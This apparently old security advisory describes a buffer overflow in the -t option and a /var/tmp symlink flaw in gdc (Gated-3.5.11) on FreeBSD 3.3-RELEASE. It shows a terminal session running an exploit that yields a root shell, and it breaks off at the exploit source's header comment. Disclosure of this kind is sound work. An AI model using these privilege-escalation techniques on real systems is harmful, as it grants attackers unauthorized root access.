Vulnerabilities in FreeBSD 3.3-RELEASE's gdc allow certain users to gain root privileges and overwrite system files. Gdc is installed by default on FreeBSD, and is given permissions as shown:
-rwsr-x--- 1 root wheel 23832 Sep 10 23:21 /usr/local/bin/gdc
(Thus only users in the group 'wheel' may run gdc).
Credit:
This information has been provided by: Brock Tellier.
Vulnerable systems:
Gated-3.5.11 on FreeBSD 3.3-RELEASE
Vulnerability #1
'/usr/local/bin/gdc' contains a buffer overflow that may ONLY be exploited by the group 'wheel'. According to the man page the default group is "gdmaint", but it was not installed this way on the tested system, nor were any instructions given to make a gdmaint group. The overflow happens when gdc is supplied a large -t time option on the command line.
Vulnerability #2
'/usr/local/bin/gdc' allows debugging output to be written to a file in /var/tmp which follows symlinks. This vulnerability can be exploited to overwrite root-owned system files (more of a DoS, since it doesn't change the destination file's perms) regardless of the user who ran gdc. Once again, a normal user without wheel or similar gid cannot run gdc. However a normal user may create the symlinks that a wheel group user's gdc will follow.
Exploits:
For the buffer overflow vulnerability:
$ gcc -o gdcx gdcx.c
$ ls -la `which gdc`
-rwsr-x--- 1 root wheel 23832 Sep 10 23:21 /usr/local/bin/gdc
$ id
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec), 0(wheel)
$ ./gdcx
gdc exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>
eip=0xbfbfdb65 offset=0 buflen=4093
NOPs to 937
Shellcode to 1004
eip to 1008
gdc: invalid wait time:
<non-display characters>
#
(we are now root).
---- gdcx.c ----
/*
* gdc exploit for Freebsd-3.3 yields euid=0(root)
* by default, only group wheel (or whatever your trusted gated group is)
* and root can run gdc
* Brock Tellier btellier@usa.net
*/
